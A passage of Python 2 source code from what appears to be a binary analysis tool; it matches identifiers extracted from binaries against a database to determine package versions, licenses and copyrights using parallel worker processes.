for rankingfile in rankingfilesperlanguage[language]:
if connectdb:
break
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
unique = r['unique']
uniques = set(map(lambda x: x[0], unique))
#alluniques.update(uniques)
if unique != []:
connectdb = True
break
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
connectdb = True
break
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
connectdb = True
break
if not connectdb:
return
scanmanager = multiprocessing.Manager()
sha256_filename_query = "select version, pathname from processed_file where checksum=%s"
sha256_license_query = "select distinct license, scanner from licenses where checksum=%s"
sha256_copyright_query = "select distinct copyright, type from extracted_copyright where checksum=%s"
for language in rankingfilesperlanguage:
## keep a list of versions per sha256, since source files often are in more than one version
sha256_versions = {}
for rankingfile in rankingfilesperlanguage[language]:
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
## indicate whether or not the pickle should be written back to disk.
## If uniquematches is empty, functionRes is empty, and variablepvs
## is also empty, then nothing needs to be written.
changed = False
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
if unique == []:
## Continue to the next item if there are no unique matches
newreports.append(r)
continue
## There are unique matches, so results should
## be written back to disk
changed = True
newuniques = []
newpackageversions = {}
packagecopyrights = []
packagelicenses = []
uniques = set(map(lambda x: x[0], unique))
lenuniques = len(uniques)
## first grab all possible checksums, plus associated line numbers
## for this string. Since these are unique strings they will only be
## present in the package (or clones of the package).
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, 'string'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## for each combination (line,sha256,linenumber) store per checksum
## the line and linenumber(s). The checksums are used to look up version
## and filename information.
sha256_scan_versions = {}
tmplines = {}
for l in vsha256s:
(line, versionsha256s) = l
for s in versionsha256s:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((line, linenumber))
else:
sha256_scan_versions[checksum] = set([(line, linenumber)])
else:
## results are already known, so copy
for v in sha256_versions[checksum]:
(version, filename) = v
if not line in tmplines:
tmplines[line] = []
tmplines[line].append((checksum, linenumber, sha256_versions[checksum]))
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(line, linenumber) = l
if not line in tmplines:
tmplines[line] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[line].append((checksum, linenumber, versres))
for v in versres:
(version, filename) = v
if checksum in sha256_versions:
sha256_versions[checksum].append((version, filename))
else:
sha256_versions[checksum] = [(version, filename)]
for l in tmplines.keys():
newuniques.append((l, tmplines[l]))
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
## optionally fill two lists with sha256 checksums for license scanning and copyright scanning
licensesha256s = []
copyrightsha256s = []
for u in newuniques:
versionsha256s = u[1]
vseen = set()
if determinelicense:
licensesha256s += map(lambda x: x[0], versionsha256s)
if determinecopyright:
copyrightsha256s += map(lambda x: x[0], versionsha256s)
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
for v in versionfilenames:
(version, filename) = v
if version in vseen:
continue
if version in newpackageversions:
newpackageversions[version] = newpackageversions[version] + 1
else:
newpackageversions[version] = 1
vseen.add(version)
## Ideally the version number should be stored with the license.
## There are good reasons for this: files are sometimes collectively
## relicensed when there is a new release (example: Samba 3.2 relicensed
## to GPLv3+) so the version number can be very significant for licensing.
## determinelicense and determinecopyright *always* imply determineversion
## TODO: store license with version number.
if determinelicense:
if len(licensesha256s) != 0:
licensesha256s = set(licensesha256s)
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), licensesha256s)
minprocessamount = min(len(licensesha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_license, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_license_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagelicenses.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
packagelicenses_tmp = []
for p in packagelicenses:
packagelicenses_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagelicenses = list(set(packagelicenses_tmp))
if determinecopyright:
if len(copyrightsha256s) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), copyrightsha256s)
minprocessamount = min(len(copyrightsha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_copyright, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_copyright_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagecopyrights.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## result is a list of {sha256sum: list of copyright statements}
packagecopyrights_tmp = []
for p in packagecopyrights:
packagecopyrights_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagecopyrights = list(set(packagecopyrights_tmp))
#newreports.append((rank, package, newuniques, uniquematcheslen, percentage, newpackageversions, packagelicenses, packagecopyrights))
newreports.append({'rank': rank, 'package': package, 'unique': newuniques, 'uniquematcheslen': uniquematcheslen, 'percentage': percentage, 'packageversions': newpackageversions, 'packagelicenses': packagelicenses, 'packagecopyrights': packagecopyrights})
res['reports'] = newreports
## Then process the results for the function names
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
if not package in functionRes['uniquepackages']:
continue
changed = True
functionnames = functionRes['uniquepackages'][package]
## right now only C is supported. TODO: fix this for other languages such as Java.
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), functionnames)
minprocessamount = min(len(functionnames), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], 'C', 'function'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(functionname, vres) = p
for s in vres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((functionname, linenumber))
else:
sha256_scan_versions[checksum] = set([(functionname, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not functionname in tmplines:
tmplines[functionname] = []
tmplines[functionname].append((checksum, linenumber, sha256_versions[checksum]))
fileres = []
if len(sha256_scan_versions.keys()) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(functionname, linenumber) = l
if not functionname in tmplines:
tmplines[functionname] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[functionname].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
functionRes['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in functionRes['versionresults'].keys():
newuniques = functionRes['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
functionRes['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
functionRes['packages'][package].append((v, vs[v]))
functionRes['versionresults'] = newresults
## Then process the results for the variable names
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
changed = True
for package in variablepvs['uniquepackages']:
vartype = 'variable'
if 'type' in variablepvs:
vartype = 'variable'
if variablepvs['type'] == 'linuxkernel':
vartype = 'kernelvariable'
uniques = variablepvs['uniquepackages'][package]
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, vartype))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(variablename, varres) = p
for s in varres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((variablename, linenumber))
else:
sha256_scan_versions[checksum] = set([(variablename, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not variablename in tmplines:
tmplines[variablename] = []
tmplines[variablename].append((checksum, linenumber, sha256_versions[checksum]))
resdict = {}
if len(sha256_scan_versions.keys()) != 0:
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(variablename, linenumber) = l
if not variablename in tmplines:
tmplines[variablename] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[variablename].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
variablepvs['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in variablepvs['versionresults'].keys():
newuniques = variablepvs['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
variablepvs['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
variablepvs['packages'][package].append((v, vs[v]))
variablepvs['versionresults'] = newresults
if changed:
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'] = list(set(leafreports['tags'] + ['ranking']))
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
unpackreport['tags'].append('ranking')
## finally shut down the scan manager
scanmanager.shutdown()
## grab variable names.
def grab_sha256_varname(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_filename(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab copyright statements from the license database
def grab_sha256_copyright(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
## 'statements' are not very accurate so ignore those
results = filter(lambda x: x[1] != 'statement', results)
reportqueue.put({sha256sum: results})
scanqueue.task_done()
## grab licenses from the license database
def grab_sha256_license(scanqueue, reportqueue, cursor, conn, query):
while True:
sha256sum = scanqueue.get(timeout=2592000)
cursor.execute(query, (sha256sum,))
results = cursor.fetchall()
conn.commit()
reportqueue.put({sha256sum: results})
scanqueue.task_done()
def grab_sha256_parallel(scanqueue, reportqueue, cursor, conn, language, querytype):
stringquery = "select distinct checksum, linenumber, language from extracted_string where stringidentifier=%s and language=%s"
functionquery = "select distinct checksum, linenumber, language from extracted_function where functionname=%s"
variablequery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
kernelvarquery = "select distinct checksum, linenumber, language, type from extracted_name where name=%s"
while True:
res = None
line = scanqueue.get(timeout=2592000)
if querytype == "string":
cursor.execute(stringquery, (line,language))
res = cursor.fetchall()
elif querytype == 'function':
cursor.execute(functionquery, (line,))
res = cursor.fetchall()
elif querytype == 'variable':
cursor.execute(variablequery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'variable', res)
elif querytype == 'kernelvariable':
cursor.execute(kernelvarquery, (line,))
res = cursor.fetchall()
res = filter(lambda x: x[3] == 'kernelsymbol', res)
conn.commit()
if res != None:
res = filter(lambda x: x[2] == language, res)
## TODO: make a list of line numbers
res = map(lambda x: (x[0], x[1]), res)
reportqueue.put((line, res))
scanqueue.task_done()
def extractJava(javameta, scanenv, funccursor, funcconn, clones):
dynamicRes = {} # {'namesmatched': 0, 'totalnames': int, 'uniquematches': int, 'packages': {} }
namesmatched = 0
uniquematches = 0
uniquepackages = {}
variablepvs = {}
if 'fields' in javameta:
fields = javameta['fields']
else:
fields = []
if 'classes' in javameta:
classes = javameta['classes']
else:
classes = []
if 'sourcefiles' in javameta:
sourcefiles = javameta['sourcefiles']
else:
sourcefiles = []
classname = javameta['classes']
methods = javameta['methods']
fields = javameta['fields']
sourcefile = javameta['sourcefiles']
if 'BAT_METHOD_SCAN' in scanenv:
query = "select distinct package from functionnamecache_java where functionname=%s"
for meth in methods:
if meth == 'main':
continue
funccursor.execute(query, (meth,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
namesmatched += 1
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]].append(meth)
else:
uniquepackages[packages_tmp[0]] = [meth]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['totalnames'] = len(set(methods))
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['uniquematches'] = uniquematches
## unique matches found.
if uniquematches != 0:
dynamicRes['packages'] = {}
## Now variable names
classpvs = {}
sourcepvs = {}
fieldspvs = {}
## classes and source file names are searched in a similar way.
## Of course, it could be that the source file is different from the
## class file (apart from the extension of course) but this is very
## uncommon. TODO: merge class name and source file name searching
if 'BAT_CLASSNAME_SCAN' in scanenv:
classes = set(map(lambda x: x.split('$')[0], classes))
query = "select package from classcache_java where classname=%s"
for i in classes:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
classname = i
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
if classres == []:
## check just the last component
classname = classname.split('.')[-1]
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = list(set(classres_tmp))
classres = map(lambda x: (x, 0), classres_tmp)
classpvs[classname] = classres
for i in sourcefiles:
pvs = []
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
if i.lower().endswith('.java'):
classname = i[0:-5]
else:
classname = i
## first try the name as found in the binary. If it can't
## be found and has dots in it split it on '.' and
## use the last component only.
funccursor.execute(query, (classname,))
classres = funccursor.fetchall()
funcconn.commit()
## check the cloning database
if classres != []:
classres_tmp = []
for r in classres:
if r[0] in clones:
class_tmp = clones[r[0]]
classres_tmp.append(class_tmp)
else:
classres_tmp.append(r[0])
classres_tmp = set(classres_tmp)
classres = map(lambda x: (x, 0), classres_tmp)
sourcepvs[classname] = classres
## A list of Java fields that should be ignored
ignorefields = set(['value', 'name', 'type', 'data', 'options', 'parent', 'description', 'instance', 'port', 'out', 'properties', 'project', 'next', 'id', 'listeners', 'status', 'target', 'result', 'index', 'buffer', 'values', 'count', 'size', 'key', 'path', 'cache', 'map', 'file', 'context', 'initialized', 'verbose', 'version', 'debug', 'message', 'attributes', 'url', 'DEBUG', 'NAME', 'state', 'source', 'password', 'text', 'start', 'factory', 'entries', 'buf', 'args', 'logger', 'config', 'length', 'encoding', 'method', 'resources', 'timeout', 'filename', 'offset', 'server', 'mode', 'in', 'connection'])
## Keep a list of which sha256s were already seen. Since the files are
## likely only coming from a few packages there is no need to hit the database
## that often.
sha256cache = {}
if 'BAT_FIELDNAME_SCAN' in scanenv:
query = "select package from fieldcache_java where fieldname=%s"
for f in fields:
## a few fields are so common that they will be completely useless
## for reporting, but processing them will take a *lot* of time, so
## just skip them. This list is based on research of many many Java
## source code files.
if f in ignorefields:
continue
pvs = []
funccursor.execute(query, (f,))
fieldres = funccursor.fetchall()
funcconn.commit()
if fieldres != []:
fieldres_tmp = []
for r in fieldres:
if r[0] in clones:
field_tmp = clones[r[0]]
fieldres_tmp.append(field_tmp)
else:
fieldres_tmp.append(r[0])
fieldres_tmp = set(fieldres_tmp)
fieldres = map(lambda x: (x, 0), fieldres_tmp)
fieldspvs[f] = fieldres
variablepvs['fields'] = fieldspvs
variablepvs['sources'] = sourcepvs
variablepvs['classes'] = classpvs
## these are the unique function names only, just add some stubs here
for i in uniquepackages:
versions = []
dynamicRes['packages'][i] = []
return (dynamicRes, variablepvs)
def scankernelsymbols(variables, scanenv, kernelquery, funccursor, funcconn, clones):
allvvs = {}
uniquevvs = {}
variablepvs = {}
for v in variables:
pvs = []
funccursor.execute(kernelquery, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
variablepvs['type'] = 'linuxkernel'
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return variablepvs
## From dynamically linked ELF files it is possible to extract the dynamic
## symbol table. This table lists the functions and variables which are needed
## from external libraries, but also lists local functions and variables.
## By searching a database that contains which function names and variable names
## can be found in which packages it is possible to identify which package was
## used.
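## Function names are looked up in functionnamecache_c and variable names in
## varnamecache_c. The resulting (dynamicRes, variablepvs) tuple is later
## stored as part of the 'ranking' entry of the file report.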
def scanDynamic(scanstr, variables, scanenv, funccursor, funcconn, clones):
dynamicRes = {}
variablepvs = {}
if not ('BAT_FUNCTION_SCAN' in scanenv or 'BAT_VARNAME_SCAN' in scanenv):
return (dynamicRes, variablepvs)
if 'BAT_FUNCTION_SCAN' in scanenv:
uniquepackages = {}
namesmatched = 0
uniquematches = 0
## caching datastructure, only needed in case there is no full cache
sha256_packages = {}
## the database made from ctags output only has function names, not the types. Since
## C++ functions could be in an executable several times with different types we
## deduplicate first
query = "select package from functionnamecache_c where functionname=%s"
for funcname in scanstr:
funccursor.execute(query, (funcname,))
res = funccursor.fetchall()
funcconn.commit()
pkgs = []
if res != []:
packages_tmp = []
for r in res:
if r[0] in clones:
package_tmp = clones[r[0]]
packages_tmp.append(package_tmp)
else:
packages_tmp.append(r[0])
packages_tmp = list(set(packages_tmp))
namesmatched += 1
## unique match
if len(packages_tmp) == 1:
uniquematches += 1
if packages_tmp[0] in uniquepackages:
uniquepackages[packages_tmp[0]] += [funcname]
else:
uniquepackages[packages_tmp[0]] = [funcname]
dynamicRes['namesmatched'] = namesmatched
dynamicRes['uniquepackages'] = uniquepackages
dynamicRes['totalnames'] = len(scanstr)
## unique matches found.
dynamicRes['uniquematches'] = uniquematches
if uniquematches != 0:
dynamicRes['packages'] = {}
dynamicRes['versionresults'] = {}
## these are the unique function names only
## TODO: here versions for function names were computed. This needs clean ups.
for package in uniquepackages:
versions = []
dynamicRes['versionresults'][package] = []
dynamicRes['packages'][package] = []
for v in set(versions):
dynamicRes['packages'][package].append((v, versions.count(v)))
## Scan C variables extracted from dynamically linked files.
if scanenv.get('BAT_VARNAME_SCAN'):
ignorevariables = set(['options', 'debug', 'verbose', 'optarg', 'optopt', 'optfind', 'optind', 'opterr'])
## keep two mappings:
## 1. unique variable names per package
## 2. package per variable name
uniquevvs = {}
allvvs = {}
query = "select distinct package from varnamecache_c where varname=%s"
for v in variables:
## These variable names are very generic and would not be useful, so skip.
## This is based on research of millions of C files.
if v in ignorevariables:
continue
pvs = []
funccursor.execute(query, (v,))
res = funccursor.fetchall()
funcconn.commit()
if res != []:
pvs = map(lambda x: x[0], res)
pvs_tmp = []
for r in pvs:
if r in clones:
pvs_tmp.append(clones[r])
else:
pvs_tmp.append(r)
if len(pvs_tmp) == 1:
if pvs_tmp[0] in uniquevvs:
uniquevvs[pvs_tmp[0]].append(v)
else:
uniquevvs[pvs_tmp[0]] = [v]
allvvs[v] = pvs_tmp
variablepvs = {'uniquepackages': uniquevvs, 'allvariables': allvvs}
variablepvs['packages'] = {}
variablepvs['versionresults'] = {}
for package in uniquevvs:
variablepvs['versionresults'][package] = []
variablepvs['packages'][package] = []
return (dynamicRes, variablepvs)
## match identifiers with data in the database
## First match string literals, then function names and variable names for various languages
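## This method runs in several concurrent workers. Each worker takes a
## (filehash, filename) tuple from scanqueue, loads the corresponding
## filereport pickle from the filereports directory under topleveldir,
## scores the extracted identifiers, writes the result back into the pickle
## under 'ranking' and finally puts the file hash on reportqueue.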
def lookup_identifier(scanqueue, reportqueue, cursor, conn, scanenv, topleveldir, avgscores, clones, scandebug, unmatchedignorecache, lock):
## first some things that are shared between all scans
if 'BAT_STRING_CUTOFF' in scanenv:
try:
stringcutoff = int(scanenv['BAT_STRING_CUTOFF'])
except:
stringcutoff = 5
else:
stringcutoff = 5
## TODO: this should be done per language
if 'BAT_SCORE_CACHE' in scanenv:
precomputescore = True
else:
precomputescore = False
usesourceorder = False
if 'USE_SOURCE_ORDER' in scanenv:
usesourceorder = True
## don't use precomputed scores when using source order
precomputescore = False
## default parameters for scoring
alpha = 5.0
scorecutoff = 1.0e-20
gaincutoff = 1
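## With these defaults a string that occurs in k distinct filenames in the
## database contributes 1/alpha^(k-1) = 1/5^(k-1) to a package score, so a
## string spread over roughly 30 or more filenames falls below scorecutoff
## and is effectively ignored. Packages whose remaining non-unique strings
## add up to less than gaincutoff are dropped from the assignment rounds below.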
kernelquery = "select package FROM linuxkernelfunctionnamecache WHERE functionname=%s LIMIT 1"
precomputequery = "select score from scores where stringidentifier=%s LIMIT 1"
while True:
## get a new task from the queue
(filehash, filename) = scanqueue.get(timeout=2592000)
## read the pickle with the data
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
if leafreports['identifier'] == {}:
## If there is no relevant data to scan continue to the next file
scanqueue.task_done()
continue
## grab the lines extracted earlier
lines = leafreports['identifier']['strings']
language = leafreports['identifier']['language']
## this should of course not happen, but hey...
scanlines = True
if not language in scanenv['supported_languages']:
scanlines = False
if lines == None:
lenlines = 0
scanlines = False
else:
lenlines = len(lines)
linuxkernel = False
scankernelfunctions = False
if 'linuxkernel' in leafreports['tags']:
linuxkernel = True
if scanenv.get('BAT_KERNELFUNCTION_SCAN') == 1 and language == 'C':
scankernelfunctions = True
## first compute the score for the lines
if lenlines != 0 and scanlines:
## keep a dict of versions, license and copyright statements per package. TODO: remove these.
packageversions = {}
packagelicenses = {}
packagecopyrights = {}
if have_counter:
linecount = collections.Counter(lines)
else:
linecount = {}
for l in lines:
if l in linecount:
linecount[l] += 1
else:
linecount[l] = 1
## first look up and assign strings for as far as possible.
## strings that have not been assigned will be assigned later based
## on their score.
## Look up strings in the database and assign strings to packages.
uniqueMatches = {}
nonUniqueScore = {}
stringsLeft = {}
sameFileScore = {}
nonUniqueMatches = {}
nonUniqueMatchLines = []
nonUniqueAssignments = {}
directAssignedString = {}
unmatched = []
ignored = []
#unmatchedignorecache = set()
kernelfuncres = []
kernelparamres = []
if scandebug:
print >>sys.stderr, "total extracted strings for %s: %d" % (filename, lenlines)
## some counters for keeping track of how many matches there are
matchedlines = 0
unmatchedlines = 0
matchednotclonelines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
nrUniqueMatches = 0
## start values for some state variables that are used
## most of these are only used if 'usesourceorder' == False
matched = False
matchednonassigned = False
matchednotclones = False
kernelfunctionmatched = False
uniquematch = False
oldline = None
notclones = []
if usesourceorder:
## keep track of which package was the most uniquely matched package
uniquepackage_tmp = None
uniquefilenames_tmp = []
## keep a backlog for strings that could possibly be assigned later
backlog = []
notclonesbacklog = []
else:
## sort the lines first, so it is easy to skip duplicates
lines.sort()
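## after sorting identical strings end up next to each other, so the
## 'oldline' check below can reuse the result of the previous database
## lookup instead of querying again.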
stringquery = "select package, filename FROM %s WHERE stringidentifier=" % stringsdbperlanguagetable[language] + "%s"
for line in lines:
#if scandebug:
# print >>sys.stderr, u"processing <|%s|>" % line
kernelfunctionmatched = False
if not usesourceorder:
## speedup if the line happens to be the same as the old one
## This does *not* alter the score in any way, but perhaps
## it should: having a very significant string a few times
## is a strong indication.
if line == oldline:
if matched:
matchedlines += 1
if uniquematch:
nrUniqueMatches += 1
#uniqueMatches[package].append((line, []))
elif matchednonassigned:
linecount[line] = linecount[line] - 1
matchednonassignedlines += 1
elif matchednotclones:
linecount[line] = linecount[line] - 1
matchednotclonelines += 1
else:
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
uniquematch = False
matched = False
matchednonassigned = False
matchednotclones = False
oldline = line
